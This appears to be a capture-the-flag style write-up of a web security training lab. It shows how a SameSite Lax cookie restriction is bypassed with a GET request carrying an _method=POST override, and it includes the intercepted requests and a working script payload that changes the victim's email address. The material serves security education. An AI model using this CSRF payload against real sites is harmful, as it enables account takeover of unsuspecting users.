SameSite Lax bypass via method override

Description

This lab's change email function is vulnerable to CSRF. To solve the lab, perform a CSRF attack that changes the victim's email address. You should use the provided exploit server to host your attack.

You can log in to your own account using the following credentials: wiener:peter

Approach

After logging in as the "wiener" user, I intercepted the change email request and sent it to repeater for further analysis:

POST /my-account/change-email HTTP/2
Host: 0a1e00ca04788ab88023d0e2003b0031.web-security-academy.net
Cookie: session=hm1jQnnLanBBd7Y2ES5hrmAGWCIQqLo0
...

email=qwe%40qwe.qwe

I tried to change the method to GET, but it only accepts POST requests:

HTTP/2 405 Method Not Allowed
Allow: POST
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 20

"Method Not Allowed"

My goal was to change the victim's email address through a CSRF attack. However, since the SameSite LAX restriction is present, a POST request won't append the cookie, thus preventing the CSRF attack. To bypass this, I needed to send a GET request and override the request method in the change email form.

To achieve this, I used the _method parameter to override the method, ensuring that the request to change the email would be sent correctly. Here’s the payload I crafted:

<script>
location="https://0a1e00ca04788ab88023d0e2003b0031.web-security-academy.net/my-account/change-email?email=ichyaboyhacker%40hacked.com&_method=POST";
</script>

This payload effectively bypasses the SameSite LAX protection by using a GET request while overriding the method to POST. By clicking Store and Deliver exploit to victim, I confirmed that the lab was solved, indicating that the victim's email address was successfully changed.